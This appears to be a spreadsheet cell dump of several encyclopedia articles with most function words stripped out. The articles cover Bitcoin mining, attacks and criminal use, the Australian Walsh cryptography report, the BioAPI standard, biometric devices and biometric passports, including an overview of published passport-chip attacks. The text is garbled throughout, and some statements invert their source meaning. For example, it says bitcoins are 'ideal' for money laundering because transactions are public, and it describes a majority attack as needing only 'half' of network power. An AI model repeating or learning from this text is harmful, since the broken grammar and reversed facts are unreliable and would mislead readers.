bitcoin miners remain china. this well peak around global market." december 2021, global hashrate mostly recovered level china's crackdown, increased shares total mining power coming u.s. (35.4%), kazakhstan (18.1%), russia (11%) instead.a 2022 survey technologies approached cryptocurrencies' technological environmental issues many perspectives noted plans using methods unconventional computing grid computing make bitcoin ether greener justified. process rough overview process mine bitcoins involves: transactions broadcast nodes. each miner node collects transactions block. each miner node works finding proof-of-work code block. when node finds proof-of-work, broadcasts block nodes. receiving nodes validate transactions holds accept valid. nodes express acceptance moving work next block, incorporating hash accepted block. mined bitcoins convention, first transaction block special transaction produces bitcoins owned creator block. this incentive nodes support network. provides move bitcoins circulation. reward mining halves every 210,000 blocks. started bitcoin, dropped late 2012 12.5 bitcoin 2016. recent halving, occurred 2020 (with block number 630,000), reduced block reward 6.25 bitcoin. this halving process programmed continue maximum times coin creation ceases. security various potential attacks bitcoin network payment system, real theoretical, considered. bitcoin protocol includes several features protect attacks, unauthorized spending, double spending, forging bitcoins, tampering blockchain. other attacks, theft private keys, require care users. unauthorized spending unauthorized spending mitigated bitcoin's implementation public-private cryptography. example, alice sends bitcoin bob, becomes owner bitcoin. eve, observing transaction, might want spend bitcoin received, cannot sign transaction without knowledge bob's private key. double spending specific problem internet payment system must solve double-spending, whereby user pays coin different recipients. example problem would sent bitcoin alice later sent bitcoin bob. bitcoin network guards double-spending recording bitcoin transfers ledger (the blockchain) visible users, ensuring transferred bitcoins previously spent.: race attack offers alice bitcoin exchange goods signs corresponding transaction, still possible also creates different transaction time sending bitcoin bob. rules, network accepts transactions. this called race attack, since race transaction accepted first. alice reduce risk race attack stipulating deliver goods eve's payment alice appears blockchain.a variant race attack (which called finney attack reference finney) requires participation miner. instead sending payment requests alice coins) network, issues alice's payment request network, accomplice tries mine block includes payment instead alice. there positive probability rogue miner succeed network, case payment alice rejected. plain race attack, alice reduce risk finney attack waiting payment included blockchain. history modification each block added blockchain, starting block containing given transaction, called confirmation transaction. ideally, merchants services receive payment bitcoin wait least confirmation distributed network, assuming payment done. confirmations merchant waits for, difficult attacker successfully reverse transaction blockchain—unless attacker controls half total network power, case called attack. deanonymisation clients deanonymisation strategy data mining anonymous data cross-referenced sources data re-identify anonymous data source. along transaction graph analysis, reveal connections bitcoin addresses (pseudonyms), possible attack links user's pseudonym address. peer using tor, attack includes method separate peer network, forcing real address transactions. attack makes bitcoin mechanisms relaying peer addresses anti-dos protection. cost attack full bitcoin network €1500 month. payment verification each miner choose transactions included exempted block. greater number transactions block equate greater computational power required solve block.upon receiving transaction node must validate particular, verify none transaction's inputs previously spent. carry check, node needs access blockchain. user trust network neighbors, keep full local copy blockchain, input verified. noted nakamoto's whitepaper, possible verify bitcoin payments without running full network node (simplified payment verification, spv). user needs copy block headers longest chain, available querying network nodes apparent longest chain obtained; then, merkle tree branch linking transaction block. linking transaction place chain demonstrates network node accepted blocks added establish confirmation. data blockchain while possible store digital file blockchain, larger transaction size, larger associated fees become. information stored block means information stored nodes, potentially creating "blockchain bloating." first block bitcoin blockchain, known "genesis block", contains famous newspaper headline hint bitcoin's mission. various items embedded, including urls websites, ascii image bernanke, material wikileaks cables, prayers bitcoin miners, original bitcoin whitepaper. other important information stored blockchain well. blockchain: insights need harvard business review, tapscott, lakhani, iansiti state "with blockchain, imagine world contracts embedded digital code stored transparent, shared databases, protected deletion, tampering, revision. intermediaries like lawyers, brokers, bankers might longer necessary. individuals, organizations, machines, algorithms would freely transact interact another little friction." criminal activity bitcoin criminals attracted attention financial regulators, legislative bodies, enforcement, media. prepared intelligence assessment, issued pointed warning investment schemes using virtual currencies, u.s. senate held hearing virtual currencies november 2013.several news outlets asserted popularity bitcoins hinges ability purchase illegal goods. 2014, researchers university kentucky found "robust evidence computer programming enthusiasts illegal activity drive interest bitcoin, find limited support political investment motives." black markets carnegie mellon university researcher estimated 2012, 4.5% transactions exchanges world drug trades single dark drugs market, silk road. child pornography, murder-for-hire, weapons also allegedly available black market sites sell bitcoin. anonymous nature lack central control markets, hard know whether services real trying take bitcoins.several deep black markets shut authorities. october 2013 silk road shut u.s. enforcement, leading short-term decrease value bitcoin. 2015, founder site sentenced life prison. alternative sites soon available, early 2014 australian broadcasting corporation reported closure silk road little impact number australians selling drugs online, actually increased. early 2014, dutch authorities closed utopia, online illegal goods market, seized bitcoins. late 2014, joint police operation european american authorities seize bitcoins close deep sites including illicit goods market silk road 2.0. enforcement activity resulted several convictions. december 2014, charlie shrem sentenced years prison indirectly helping send million silk road drugs site, february 2015, founder, ross ulbricht, convicted drugs charges given sentence double life imprisonment plus years.some black market sites seek steal bitcoins customers. bitcoin community branded site, sheep marketplace, scam prevented withdrawals shut alleged bitcoins theft. separate case, escrow accounts bitcoins belonging patrons different black market hacked early 2014.according internet watch foundation, uk-based charity, bitcoin used purchase child pornography, almost websites accept payment. bitcoin sole purchase child pornography online, troels oertling, head cybercrime unit europol, states, "ukash paysafecard... [also] used material." however, internet watch foundation lists around sites exclusively accept bitcoins. some sites shut down, deep crowdfunding website aimed fund creation child porn. furthermore, hyperlinks child porn websites added blockchain arbitrary data included transaction made. money laundering bitcoins ideal money laundering, transactions public. authorities—including european banking authority, fbi, national treasury (south africa) financial action task force g7—have expressed concerns bitcoin used money laundering. early 2014, operator u.s. bitcoin exchange, charlie shrem, arrested money laundering. subsequently, sentenced years prison "aiding abetting unlicensed money transmitting business".alexander vinnik, alleged owner btc-e, arrested greece july 2017, billion money laundering charges flouting anti-money laundering (aml) laws report uk's treasury home office named national risk assessment money laundering terrorist financing" (october 2015) found that, twelve methods examined report, bitcoin carries lowest risk used money laundering, common money laundering method banks.roman sterlingov arrested april 2021 allegedly laundering million us$336 million. according reports criminal investigation, sterlingov principal operator cryptocurrency tumbler bitcoin fog, launched 2011. ponzi scheme ponzi scheme using bitcoins, bitcoin savings trust promised investors weekly interest, raised least 700,000 bitcoins 2011 2012. july 2013, u.s. securities exchange commission charged company founder 2013 "with defrauding investors ponzi scheme involving bitcoin". also lists network protocols list bitcoin organizations web3 economics bitcoin references</t>
  </si>
  <si>
    <t>Walsh Report (cryptography)</t>
  </si>
  <si>
    <t>walsh report australian cryptography policy review undertaken australian government gerard walsh, initially released 1996 withdrawn sale public. electronic frontiers australia (efa) obtained redacted copy freedom information laws published efa's website. subsequently, unredacted copy found redacted parts added copy. policy review walsh report australian cryptography policy review undertaken request secretary attorney-general's department gerard walsh, former deputy director australian security intelligence organisation (asio). report included broad analysis cryptography issues australian context.the report, titled review policy relating encryption technologies, popularly called walsh report.in report, walsh found lack coordination government establishment cryptography policy. walsh also reported clarity department minister responsible cryptographic policy. consequently, danger policy would developed without coordinated.the main advice given walsh report major legislative action safeguard law-enforcement national security required time. specific options recommended report legislation cryptography, report recommend mandatory recovery.recommendations report minor legislative actions included: establishment summary intrusive investigative powers consider setting additional serious offence cryptography used obstruct criminal investigation consider establishing power allow police demand encryption keys recovery escrow scheme, advocated united states, established australia. history background walsh invited undertake review following barrett report, concluded: "while australian agencies report encryption problem date, likely become future." initial issue walsh report issued october 1996. deposit copies after printed, deposit copies report lodged australian government publishing service (agps) around university public libraries free deposit scheme. embargo report listed sale january 1997 agps. three weeks later, electronic frontiers australia (efa) enquired actually available.in february 1997, walsh report publicly released, australian attorney-general's department embargoed withheld report commercial sale. request march 1997 applied release walsh report freedom information 1982.initially, request denied. following review requested efa, june 1997 obtained copy walsh report redacted national security, defence, international relations, internal working document, enforcement public safety grounds.efa published redacted version walsh report website. discovery deposit copies december 1998 uncensored copy walsh report discovered state library tasmania nick ellsmore, university student hobart. ellsmore alerted availability report. publication unredacted version comparing redacted unredacted copies possible identify censored sections report.efa added redacted parts copy internet, highlighted red.following discovery uncensored copies walsh report, australian newspaper revealed censored recommendations. release complete report also covered hobart's mercury, melbourne's sun-herald, sydney morning herald, many internet news sites radio stations perth sydney. recall deposit copies february 1999, australian's revelations, australian government information service (ausinfo), government publisher, wrote deposit libraries. ausinfo letter, said "attorney-general's department wants copies recalled" asked copies report returned ausinfo. spokesperson daryl williams, attorney-general, said release walsh report discussed ausinfo, denied government initiated recall. february 1999, cryptography committee chairman, greg taylor, said: "the bumbling attempts censor [walsh] report served focus international attention it". censored parts redacted observations included: encrypted data stored transmitted beyond visibility reach investigative agencies.the censored recommendations included: software booby-traps bugging australian enforcement agencies given power "hack" corporate computer systems alter proprietary software allow monitoring communications strong cryptographic products obtained internet, efficacy export controls cryptographic products defensive strategy dubious conclusion barrett report time encryption becomes problem enforcement national security agencies here, soon surveillance powers asio extended. references external links walsh report electronic frontiers australia website electronic signatures law, stephen masoh (2003)</t>
  </si>
  <si>
    <t>BioAPI</t>
  </si>
  <si>
    <t>bioapi (biometric application programming interface) part international standards support systems perform biometric enrollment verification identification). defines interfaces modules enable software multiple vendors integrated together provide biometrics application within system, systems using defined biometric interworking protocol (bip) below. biometrics (measurements physical characteristics person) increasingly used provide verification identity individual, enrolled (one physical characteristics measured). computer systems perform biometric enrollment, verification, identification becoming increasingly used. bioapi specification enables systems produced integration modules multiple independent vendors. origins bioapi specification international standards produced jointly international organization standardization (iso) international electrotechnical commission (iec) joint technical committee (jtc1), subcommittee biometrics. standard based early work done united states america bioapi consortium called bioapi bioapi 1.1, specifications revised extended work introduced iso/iec. first international version therefore called bioapi 2.0. subsequent international version bioapi containing extensions user interface-related features enhancements produced bioapi 2.1. further enhancements bioapi expected. bioapi specified iso/iec 19784-1 first published 2006. what why? purpose bioapi specification define architecture necessary interfaces (using programming language specifications) allow biometric applications (perhaps distributed across network) integrated modules provided different vendors. ability system integrator produce complete systems using components multiple vendors essential rapidly changing technology biometrics. gives flexibility provision modules, avoids vendor lock-in, provides degree future-proofing best available biometrics technologies change. modules integrated software components containing capture devices, fingerprint readers, cameras face recognition, iris scanners, signature recognition devices, vascular imaging systems, etc. they also modules provide support image processing biometric data, feature extraction form compression specific given biometric technology allows direct matching compressed formats example, relative distances face eyes, nose, mouth, number ridges identifiable ridge endings ridge bifurcations). addition, modules provide archiving retrieval biometric records support matching searching match also recognized part bioapi architecture. applications concerned personal identification (for example credit cards), specific areas identity card verification, checks duplicate enrollment, passports, physical access control commercial environment airport employees merchant seamen wishing on-shore arrival port. whilst today system commonly built using single device single application, likely long term many applications interact (securely, network) common trusted devices (with various security policies certificates). also expected future biometrics applications multiple biometric modalities (for example, fingerprint, iris, face), improve accuracy identification cope people missing finger, disability problems prevent iris face recognition. bioapi supports cases. basic architecture basic architecture bioapi illustrated figure page. there multiple possible (independent) biometric applications interact bioapi framework, turn routes messages biometric service providers (bsps) support various biometric capture devices, image enhancement modules, feature extraction, matching, searching, etc. later extension architecture introduces concept biometric function provider (bfp) defines lower-level interfaces controlling bsp. this minimizes amount software biometric device vendor needs develop, allowing (other) software vendors work producing interface framework. procurement issues bioapi framework heart bioapi. procurement biometric systems need consider merits basing invitations-to-tender systems conforming bioapi standard, contain bioapi framework module. importance framework module recognized bioapi consortium, identifies implementation framework biofoundry. distributed systems might uncommon find multiple biometric applications multiple biometric devices single computer system, long-term telebiometrics allow multiple biometrics applications multiple systems internet interwork multiple systems support biometrics devices. bioapi already laid foundations this, architecture. another iso/iec 1/sc standard bioapi interworking protocol (bip) specifies enhancement bioapi framework essentially maps calls network messages (defined using asn.1) provide distributed bioapi system. also progressed recommendation itu-t joint text iso/iec. references iso/iec 19784-1, information technology bioapi biometric application programming interface part bioapi specificationiso/iec 24708, information technology bioapi interworking protocol (bip)</t>
  </si>
  <si>
    <t>Biometric device</t>
  </si>
  <si>
    <t>biometric device security identification authentication device. such devices automated methods verifying recognising identity living person based physiological behavioral characteristic. these characteristics include fingerprints, facial images, iris voice recognition. history biometric devices thousands years. non-automated biometric devices since ancient babylonians would sign business transactions pressing fingertips clay tablets. automation biometric devices first seen 1960s. federal bureau investigation (fbi) 1960s, introduced indentimat, started checking fingerprints maintain criminal records. first systems measured shape hand length fingers. although discontinued 1980s, system precedent future biometric devices. subgroups characteristic human body used access information users. according characteristics, sub-divided groups are: chemical biometric devices: analyses segments grant access users. visual biometric devices: analyses visual features humans grant access includes iris recognition, face recognition, finger recognition, retina recognition. behavioral biometric devices: analyses walking ability signatures (velocity sign, width sign, pressure sign) distinct every human. olfactory biometric devices: analyses odor distinguish varied users. auditory biometric devices: analyses voice determine identity speaker accessing control. uses workplace biometrics used establish better accessible records hour's employee's work. with increase "buddy punching" case employees clocked coworkers fraudulently inflated work hours) employers looked towards technology like fingerprint recognition reduce fraud. additionally, employers also faced task proper collection data entry exit times. biometric devices make largely fool proof reliable ways enabling collect data employees present enter biometric details unique them. immigration demand travel grows people travel, modern-day airports implement technology long queues. biometrics implemented airports enable quick recognition passengers hence lead lower volume people standing queues. example dubai international airport plans make immigration counters relic past implement iris move technology (iom) help seamless departures arrivals passengers airport. handheld personal devices fingerprint sensors found mobile devices. fingerprint sensor used unlock device authorize actions, like money file transfers, example. used prevent device used unauthorized person. present biometric devices personal signature verification systems this highly recognised acceptable biometrics corporate surroundings. this verification taken step capturing signature taking account many parameters revolving around like pressure applied signing, speed hand movement angle made surface used make signature. this system also ability learn users signature styles vary user. hence taking sample data, system able increase accuracy. iris recognition system iris recognition involves device scanning pupil subject cross referencing data stored database. secure forms authentication, fingerprints left behind surfaces, iris prints extremely hard stolen. iris recognition widely applied organisations dealing masses, aadhaar identification carried government india keep records population. reason iris recognition makes iris prints humans, hardly evolve one's lifetime extremely stable. problems present biometric devices biometric spoofing biometric spoofing method fooling biometric identification management system, counterfeit mold presented front biometric scanner. this counterfeit mold emulates unique biometric attributes individual confuse system artifact real biological target gain access sensitive data/materials. high-profile case biometric spoofing came limelight found german defence minister, ursula leyen's fingerprint successfully replicated chaos computer club. group used high quality camera lenses shot images feet away. they used professional finger software mapped contours ministers thumbprint. although progress made stop spoofing. using principle pulse oximetry- liveliness test subject taken account measure blood oxygenation heart rate. this reduces attacks like ones mentioned above, although methods commercially applicable costs implementation high. this reduces real world application hence makes biometrics insecure methods commercially viable. accuracy accuracy major issue biometric recognition. passwords still extremely popular, password static nature, biometric data subject change (such one's voice becoming heavier puberty, accident face, could lead improper reading facial scan data). when testing voice recognition substitute pin-based systems, barclays reported voice recognition system percent accurate. this statistic means many customers' voices might still recognised even correct. this uncertainty revolving around system could lead slower adoption biometric devices, continuing reliance traditional password-based methods. benefits biometric devices traditional methods authentication biometric data cannot lent hacking biometric data complicated hence makes safer traditional methods authentication like passwords lent shared. passwords ability judge user rely data provided user, easily stolen biometrics work uniqueness individual. passwords forgotten recovering take time, whereas biometric devices rely biometric data tends unique person, hence risk forgetting authentication data. study conducted among yahoo! users found least percent yahoo users forgot passwords every month, hence makes accessing services lengthy consumers process recovering passwords lengthy. these shortcomings make biometric devices efficient reduces effort user. future researchers targeting drawbacks present-day biometric devices developing reduce problems like biometric spoofing inaccurate intake data. technologies developed are- united states military academy developing algorithm allows identification ways individual interacts computers; algorithm considers unique traits like typing speed, rhythm writing common spelling mistakes. this data allows algorithm create unique profile user combining multiple behavioral stylometric information. this difficult replicate collectively. recent innovation kenneth okereafor and, presented optimized secure design applying biometric liveness detection technique using trait randomization approach. this novel concept potentially opens ways mitigating biometric spoofing accurately, making impostor predictions intractable difficult future biometric devices. simulation kenneth okereafor's biometric liveness detection algorithm using multi-biometric framework consisting liveness parameters facial print, finger print iris pattern traits resulted system efficiency 99.2% cardinality distinct randomization combinations. uniqueness okereafor's innovation lies application uncorrelated biometric trait parameters including intrinsic involuntary biomedical properties blinking pattern, pulse oxymetry, finger spectroscopy, electrocardiogram, perspiration, etc. group japanese researchers created system uses sensors chair identify contours unique pressure points person. this derrière authenticator, still undergoing massive improvements modifications, claimed accurate seen application anti theft device mechanisms cars. inventor lawrence glaser developed patented technology appears first high definition display. however, unlike displays dimensional pixel arrays, technology incorporates pixel stacks, accomplishing series goals leading capture multi-biometric. believed first man-made device capture distinct biometrics region pixel stacks (forming surface) instant, allowing data form third biometric, complex pattern inclusive data aligns. example would capture finger print capillary pattern precisely moment. other opportunities exist technology, capture kirlean data assures finger alive event, capture bone details forming another biometric used others previously mentioned. concept stacking pixels achieve increased functionality less surface area combined ability emit color single pixel, eliminating need (red green blue) surface emissions. lastly, technology tested high power cadmium magnetics check distortion anomalies, inventor wanted also embed magnetic emission magnetic collection surface technology, without exhibiting magnetic stripes surface. devices, smart cards, pass magnetic data orientation automatically sensing user done, using data card "swiped" inserted reader. this technology detect touch read gestures distance, without user side camera active electronics surface. multibiometrics hardens automated identity acquisition factor 800,000,000 prove difficult hack emulate. references</t>
  </si>
  <si>
    <t>Biometric passport</t>
  </si>
  <si>
    <t>biometric passport (also known e-passport digital passport) traditional passport embedded electronic microprocessor chip contains biometric information used authenticate identity passport holder. uses contactless smart card technology, including microprocessor chip (computer chip) antenna (for power chip communication) embedded front back cover, centre page, passport. passport's critical information printed data page passport, repeated machine readable lines stored chip. public infrastructure (pki) used authenticate data stored electronically passport chip, making expensive difficult forge security mechanisms fully correctly implemented. many countries moving towards issuing biometric passports citizens. malaysia first country issue biometric passports 1998. december 2008, countries issuing passports, increased mid-2019.the currently standardised biometrics used type identification system facial recognition, fingerprint recognition, iris recognition. these adopted assessment several different kinds biometrics including retinal scan. document chip characteristics documented international civil aviation organization's (icao) 9303 (icao 9303). icao defines biometric file formats communication protocols used passports. only digital image (usually jpeg jpeg 2000 format) biometric feature actually stored chip. comparison biometric features performed outside passport chip electronic border control systems (e-borders). store biometric data contactless chip, includes minimum kilobytes eeprom storage memory, runs interface accordance iso/iec 14443 international standard, amongst others. these standards intend interoperability different countries different manufacturers passport books. some national identity cards, netherlands, albania brazil, fully icao 9303 compliant biometric travel documents. however others, united states passport card, not. data protection biometric passports protection mechanisms avoid and/or detect attacks: non-traceable chip characteristics random chip identifiers reply request different chip number. this prevents tracing passport chips. using random identification numbers optional. basic access control (bac) protects communication channel chip reader encrypting transmitted information. before data read chip, reader needs provide derived machine readable zone: date birth, date expiry document number. used, attacker cannot (easily) eavesdrop transferred information without knowing correct key. using optional. passive authentication (pa) aimed identifying modification passport chip data. chip contains file, document security object (sod), stores hash values files stored chip (picture, fingerprint, etc.) digital signature hashes. digital signature made using document signing signed country signing key. file chip (e.g., picture) changed, detected since hash value incorrect. readers need access used public country keys check whether digital signature generated trusted country. using mandatory. according september 2011 united states central intelligence agency document released wikileaks december 2014, "although falsified e-passports correct digital signature, inspectors detect fraud passports countries participate international civil aviation organization's public directory (icao pkd)." january 2017, e-passport-issuing countries belong program. active authentication (aa) prevents cloning passport chips. chip contains private cannot read copied, existence easily proven. using optional. extended access control (eac) adds functionality check authenticity chip (chip authentication) reader (terminal authentication). furthermore, uses stronger encryption bac. typically used protect fingerprints iris scans. using optional. european union, using mandatory documents issued starting june 2009. supplemental access control (sac) introduced icao 2009 addressing weaknesses. introduced supplement (for keeping compatibility), replace future. shielding chip this prevents unauthorised reading. some countries including least integrated thin metal mesh passport's cover shield passport cover closed. shielding optional.to assure interoperability functionality security mechanisms listed above, icao german federal office information security (bsi) specified several test cases. these test specifications updated every protocol covering details starting paper used ending chip included. attacks since introduction biometric passports, several attacks presented demonstrated. non-traceable chip characteristics 2008 radboud/lausitz university team demonstrated possible determine country passport chip without knowing required reading team fingerprinted error messages passport chips different countries. resulting lookup table allows attacker determine chip originated. 2010 chothia vitaliy smirnov documented attack allows individual passport traced, sending specific authentication requests. 2016 avoine published survey security privacy issues passport protocols, technique track passports introduced, based response time basic commands. basic access control (bac) 2005 marc witteman showed document numbers dutch passports predictable, allowing attacker guess/crack required reading chip. 2006 adam laurie wrote software tries known passport keys within given range, thus implementing witteman's attacks. using online flight booking sites, flight coupons public information possible significantly reduce number possible keys. early biometric passports used all, allowing attacker read chip's content without providing key. passive authentication (pa) 2006 lukas grunwald demonstrated trivial copy passport data passport chip standard iso/iec 14443 smartcard using standard contactless card interface simple file transfer tool. grunwald used passport active authentication (anti-cloning) change data held copied chip, thus keeping cryptographic signature valid. 2008 jeroen beek demonstrated passport inspection systems check cryptographic signature passport chip. demonstration beek altered chip information signed using document signing non-existing country. this detected checking country signing keys used sign document signing keys. check country signing keys icao used. only countries using central database. beek update original passport chip: instead epassport emulator used. also 2008, hacker's choice implemented attacks published code verify results. release included video clip demonstrated problems using forged elvis presley passport recognized valid passport. active authentication (aa) 2005 marc witteman showed secret active authentication retrieved using power analysis. this allow attacker clone passport chips optional active authentication anti-cloning mechanism chips chip design susceptible attack. 2008 jeroen beek demonstrated optional security mechanisms disabled removing presence passport index file. this allows attacker remove amongst others anti-cloning mechanisms (active authentication). attack documented supplement 9303 (r1-p1_v2_siv_0006) solved patching inspection system software. note supplement features vulnerable examples document implemented result vulnerable inspection process. 2014 calderoni show procedure bypass security protocol commonly adopted prove chip authenticity (active authentication) within first-generation electronic passports. discussed breach related metadata files (ef.com, ef.sod) allows attacker conceal data required inspection system protocol's execution. this breach facilitate malicious user using fake documents cloned original ones.extended access control (eac) 2007 lukas grunwald presented attack make eac-enabled passport chips unusable. grunwald states eac-key required reading fingerprints updating certificates stolen compromised, attacker upload false certificate issue date future. affected chips block read access future date reached. opposition privacy proponents many countries question protest lack information exactly passports' chip contain, whether affect civil liberties. main problem point data passports transferred wireless rfid technology, become major vulnerability. although could allow id-check computers obtain person's information without physical connection, also allow anyone necessary equipment perform task. personal information passport numbers chip encrypted, information might wind wrong hands. december 2006, published article british epassport, citing stories adding that: "nearly every country issuing passport security experts yelling lungs trying shout out: 'this secure. this good idea technology'", citing specialist states much complicated. places done wrong round reading data first, parsing data, interpreting data, verifying whether right. there lots technical flaws things forgotten, basically supposed supposed higher security level. not."and adding future identity information society (fidis) network's research team body security experts funded european union) "also come epassport scheme... [stating that] european governments forced document people dramatically decreases security increases risk identity theft."most security measures designed untrusted citizens (the "provers"), scientific security community recently also addressed threats untrustworthy verifiers, corrupt governmental organizations, nations using poorly implemented, unsecure electronic systems. cryptographic solutions private biometrics proposed mitigate threats mass theft identity. these scientific study, implemented biometric passports. list biometric passports africa algeria issued since january 2012. valid years adults, years minors. botswana issued since march 2010. cape verde issued since january 2016, costing €50. noted scheme gradually expand cape verdean diplomatic missions boston lisbon future. egypt egypt issue biometric passports. gabon issued since january 2014. ghana issued since march 2010 costing 50–100 adults children. passports contain several technological characteristics biometric technology. however ghanaian biometric passports carry "chip inside" symbol mandatory icao-standard electronic passports. kenya issued since september 2017. contain fingerprints, facials signature including vital information, icao compliant. july 2019, foreign embassies berlin, paris, london, washington, started processing applications kenyans diaspora. kenya plans invalidate style passports december 2021. lesotho date introduction uncertain. however, enabling statute tabled november 2016. madagascar issued since 2014 costs 110,000 ariary. since september 2014, mandatory malagasy citizens depart country biometric passport. mauritania issued since 2011, costs us$115.68. valid years. morocco issued since 2008 trial, general since september 2009, costs (approximately €47). mozambique issued since september 2014. issuance passports suspended days later resumed february 2015. namibia issued since january 2018. nigeria issued since 2007. harmonized ecowas smart electronic passport issued nigerian immigrations service powered biometric technology tandem international civil aviation organization (icao) specifications international travels. travellers' data captured biometric passport accessed instantly read security agent spot globe integrated network systems configured linked centrally-coordinated passport data bank managed nigerian immigrations service. rwanda issued since june 2019, compliance east african community technical specifications well international civil aviation organization (icao). among features include microchip making tamper-proof. rwandan passport issued rwandan citizens international travel. rwanda started issuing east african community biometric passport also known e-passport june 2019 replacing ones stay valid june 2021, passports valid five years years. ordinary, service, diplomatic passports issued. tanzania, united republic issued since january 2018. togo issued since august 2009, cost 30,000 francs. togolese residing abroad, price varies. tunisia tunisia ministry interior stated start issuing biometric passports year 2016 happen. somalia issued since october 2006, costs us$100 applied inside somalia, us$150 abroad. south sudan issued since january 2012. passport valid five years. sudan issued since 2009, costs (approximately us$100), students children. valid years, years commercial passport.the electronic passport issued three categories. citizen's passport (ordinary passport) issued ordinary citizens contain pages. business men/women need travel often commercial passport contain pages. smaller passports contain pages issued children. microprocessor chip contain holder's information. zimbabwe zimbabwean government launched e-passports 15th december 2021 chiwashira building harare. asia armenia issued since july 2012. contains digital images fingerprints, photo electronic signature passport holder. valid years. azerbaijan issued since september 2013. contains information passport holder's facial features, well finger palm prints. bangladesh issued since april 2010, biometric machine-readable passports cost ৳3450 (us$37) regular delivery, including taxes, ৳6900 (us$74) express delivery including taxes. e-passports cost ৳4025 (us$43) ৳13800 (us$150) taxes included. cost varies depending number pages validity e-passport. e-passport valid either five years years depending applicant. bangladesh first country south asia issue e-passports eligible citizens. electronic microprocessor chip embedded e-passport forty-one different security features, including holographic images embossed thin film laminate, change colour light appear move. demographic biometric information bearer including fingerprints fingers, iris scan, color photograph face digital signature stored chip e-passport. government bangladesh issues three different types e-passports. these diplomatic passports cover; official passports blue cover; regular ordinary passports green cover. brunei issued since february 2007. bruneian epassport functions biometric passports. cambodia issued since july 2014. cost 5-year passport, issued children aged five under, us$80; 10-year passport, issued people older five, costs us$100. china january 2011, ministry foreign affairs people's republic china launched trial issuance e-passports public affairs. face, fingerprint biometric features passport holder digitalized stored pre-installed contactless smart chip passport. july 2011, ministry began issuing biometric passports individuals conducting public affairs work overseas behalf chinese government.ordinary biometric passports introduced ministry public security starting 2012. cost passport (approximately us$31) first time applicants china us$35) renewals passports issued abroad. effective july 2017, cost biometric ordinary passport reduced (approximately us$24) first time applicants renewal applicants. april 2017, china issued million biometric ordinary passports. georgia issued since 2010. valid years adults, costing lari issued tenth business day. issuance cost lari. price photo lari) needs paid additionally. there discounts, e.g. discount persons hong kong 2006, immigration department announced unihub limited pccw subsidiary company heading consortium suppliers, including keycorp) tender provide technology produce biometric passports. february 2007, first biometric passport introduced. cover biometric passport remains essentially previous versions, addition "electronic passport" logo bottom. however, design inner pages changed substantially. design conforms document design recommendations international civil aviation organization. epassport featured 2008 stockholm challenge event finalist stockholm challenge award public administration category. hong kong epassport design praised account "multiple state-of-the-art technologies [which] seamlessly integrated sophisticated electronic passport system (e-passport system)". cost hksar passport hk$370 us$48) 32-page passport hk$460 us$59) 48-page passport. india government india issues three different types passports diplomatic passports; official passports; regular ordinary passports. india initiated first phase deployment biometric e-passport diplomatic passport holders india abroad 2008. unlike diplomatic passport holders, ordinary indian citizens eligible thus issued e-passports. passports designed indigenously central passport organization, india security press, nashik kanpur. passport contains security chip personal data digital images. initially, passports chip photograph passport holder subsequently include holder's fingerprint(s). biometric passport tested passport readers abroad noted 4-second response time less half passport seconds). passport need carried metal jacket security reasons first needs passed reader, generates access keys unlock chip data reader access. june 2008 indian passport authority issued first e-passport pratibha patil, president india. e-passport project first phase deployment initially restricted diplomatic passport holders only. 2019, government india floated three-stage international tender manufacture e-passports ordinary indian citizens. once tendering procurement process complete, indian government hopes start issuing e-passports ordinary indian citizens sometime coming years. indonesia issued since january 2011. passport costs rp655,000 (us$66) 48-page valid years, rp405,000 (us$41) 24-page passport valid years. diplomatic service biometric passports issued since august 2021. iran issued since july 2007 diplomatic service passports, february 2011 ordinary biometric passports. cost passport approximately 1,500,000 (less issued inside iran, euros issued overseas. iraq issued since february 2010, costing 25,000 dinars israel issued since july 2013 2-year pilot project biometric database law. this optional. august 2013, passport expiring years could replaced free charge biometric upon request. passports expiring within years charged full fee. review pilot project (that supposed concluded 2015) postponed order minister interior later date, controversy regarding creation biometric database rather storing biometric data passport's chip, practice many countries. 2015, duration pilot project extended 2017. 2017, pilot project ended. newly issued passports required biometric.to obtain biometric passport, applicant must appear interior ministry office photographed special camera records information facial bone structure, distance one's eyes, ears eyes ratio facial features another. applicant also fingerprinted information stored high-tech electronic passport."as january 2022, israeli passports issued airport outside israel biometric, generally valid 5–10 years year issued emergency passport airport). japan issued since march 2006. passports meet requirements visa waiver program calls countries roll biometric passports october 2006. kazakhstan kazakhstan presented concept implementing biometric passport 2009. kuwait issued since march 2017. late 2018 older non-biometric passports longer valid use. laos issued since september 2016. lebanon issued since august 2016. macau issued since september 2009. malaysia issued since 1998. malaysia however member visa waiver program (vwp) first biometric passport conform standards biometric document malaysian biometric passport issued several years ahead requirement. difference lies storage fingerprint template instead fingerprint image chip, rest technologies same. also biometric passport designed read receiving country authorisation malaysian immigration department. malaysia started issuing icao compliant passports february 2010.malaysia used issue passports validity years years, passport years validity withdrawn since january 2015.the pricing malaysian passport (approximately years validity, (approximately senior citizens, children hajj pilgrims, students studying abroad free disabled citizens. maldives issued since july 2006. passport follows completely design, features passport holder's facial fingerprint information biometric identifiers. 32-page ordinary passport cost rf350, 64-page ordinary passport cost rf600. children years people applying passports diplomatic missions abroad issued 32-page non-electronic ordinary passport, cost rf250. mongolia issued since 2016. nepal nepal started issuing e-passport 2021. oman issued since 2014. pakistan government pakistan issues three different types passports. these diplomatic passports; official passports; ordinary passports. march 2022, prime minister imran khan launched e-passport service, twenty-nine security features added. initial stage, e-passport facility available diplomatic officials government officials issued diplomatic passports official passports respectively. rest population pakistan (regular citizens) eligible e-passport thus issued e-passports. philippines issued since august 2009, costs ₱950. qatar issued since april 2008, costs 200. saudi arabia february 2022; saudi arabian ministry interior announced began issuing electronic saudi passport, issuing fees past (300sar years 600sar years). singapore issued since august 2006, costs applied online, mail deposit applied singapore overseas mission. valid years. passport complies visa waiver program. south korea issued since august 2008, costs 55,000 (us$55). validity years. taiwan issued since december 2008, costs nt$1,600 ordinary passport either years validity. tajikistan issued since february 2010. thailand diplomats government officials passports issued 2005. from june 2005, limited quantity passports issued thai citizens, however, august 2005 full operational service installed thailand became first country asia issue icao compliant biometric passport. turkey turkish passports compatible european union standards available since june 2010. colours biometric passports also changed. accordingly, regular passports; claret red, special passports; bottle green diplomatic passports wrap black colours.turkish minister state announced government printing passports government minting office since private contractor failed deliver march 2016.as january 2022, cost issuing 10-year passport turkey ₺1703.30 (approximately €115). turkmenistan turkmenistan became first country ex-ussr, mid-asia region issue icao-compliant biometric passport. passport available since july 2008. united arab emirates united arab emirates ministry interior began issue biometric passports december 2011, making second state launch biometric passports qatar. 